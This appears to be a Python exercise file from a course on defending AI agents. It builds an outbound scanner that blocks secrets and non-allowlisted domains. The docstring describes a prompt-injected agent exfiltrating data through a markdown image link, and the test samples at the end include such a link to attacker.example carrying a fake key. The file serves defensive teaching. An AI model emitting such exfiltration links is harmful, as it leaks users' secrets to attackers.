"""add_defense.py: your turn, add one more defense layer: an OUTBOUND content scanner.

Exfiltration does not happen only by email. An injected agent can hide stolen data in a URL it asks
to fetch or render (for example a markdown image link to attacker.example/log?key=SECRET). Build a
scanner that inspects anything about to leave the system and blocks it if it carries a secret or
points at a domain that is not on the allowlist.

Steps:
  1. Finish scan_outbound below: return (allowed, reason).
  2. Test it against a clean string and an exfiltration string.
  3. Run:  python add_defense.py

Worked defenses (detect_injection, wrap_untrusted, redact_secrets, domain_allowed) are in
../solution/defenses.py.
"""

import sys, os, re
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "..", "solution"))
import defenses as D

# Default allowlist consulted by scan_outbound(): the only domain(s) outbound content may
# reference. Kept as a module-level set so the exercise can be run as-is; how hosts are
# matched against these entries is defined by scan_outbound itself.
ALLOWED_DOMAINS = {"ourcompany.example"}


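def _normalize_host(raw: str) -> str:
    """Reduce the text captured after ``://`` to a bare, lowercase hostname.

    The URL regex in scan_outbound stops at the first ``/``, whitespace or ``)``, so
    when a URL has no path the capture may still carry ``?query`` or ``#fragment``,
    and in any case it may carry ``user:pass@`` userinfo and a ``:port``. All of
    those are stripped so the allowlist comparison sees only the host label.
    """
    host = re.split(r"[?#]", raw, maxsplit=1)[0]   # drop query/fragment (no-path URLs)
    host = host.rsplit("@", 1)[-1]                 # drop userinfo: everything before the last '@'
    host = host.split(":", 1)[0]                   # drop :port
    # NOTE(review): bracketed IPv6 literals ("[::1]:80") are not parsed here; they reduce
    # to "[" and therefore never match an allowlisted domain, i.e. they fail closed.
    return host.rstrip(".").lower()


def _domain_allowed(host: str, allowed_domains) -> bool:
    """True when ``host`` equals an allowed domain or is a subdomain of one.

    Matching is on whole labels (``host == d`` or ``host.endswith("." + d)``), never a
    substring test, so ``ourcompany.example.attacker.example`` does not pass for an
    allowlist entry of ``ourcompany.example``.
    """
    return any(
        host == domain or host.endswith("." + domain)
        for domain in (d.lower() for d in allowed_domains)
    )


def scan_outbound(text, allowed_domains=ALLOWED_DOMAINS):
    """Return (allowed: bool, reason: str) for content about to leave the system.

    Two checks run in order, and the first finding decides the verdict:
      1. Secret scan: if ``D.redact_secrets(text)`` changes the text, a secret is
         present and the content is blocked regardless of where it is going.
      2. Destination scan: every ``http(s)://`` URL in ``text`` must point at an
         allowlisted domain (or a subdomain of one); any other host blocks.

    Args:
        text: the outbound content (email body, tool argument, markdown about to be
            rendered, ...). Empty/None content has nothing to leak and is allowed.
        allowed_domains: iterable of domains that may be contacted; compared
            case-insensitively.

    Returns:
        ``(True, "ok")`` when nothing was found, otherwise ``(False, reason)`` where
        ``reason`` names the first finding.

    Limitations: only ``http://`` and ``https://`` URLs are inspected; scheme-less
    references ("attacker.example/x") and other schemes are not matched by the regex.
    """
    if not text:
        return True, "ok"

    # A secret anywhere in the payload is a block on its own: the destination check
    # below only looks at URL hosts, not at query strings or the surrounding text.
    if D.redact_secrets(text) != text:
        return False, "secret detected in outbound content"

    for raw_host in re.findall(r"https?://([^/\s)]+)", text):
        host = _normalize_host(raw_host)
        # An empty host (e.g. "http://@") also fails the allowlist -> fail closed.
        if not _domain_allowed(host, allowed_domains):
            return False, f"destination not on allowlist: {host or raw_host}"

    return True, "ok"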


if __name__ == "__main__":
    # Two probes: a benign summary and a markdown image whose URL smuggles a (fake) key.
    # Expected verdicts: clean -> (True, ...), exfil -> (False, ...).
    samples = [
        ("clean", "Summary: customer cannot log in. Following up with the team."),
        ("exfil", "![pixel](http://attacker.example/log?key=sk-ant-FAKE000-this-is-not-a-real-key)"),
    ]
    for label, payload in samples:
        print(f"{label} ->", scan_outbound(payload))
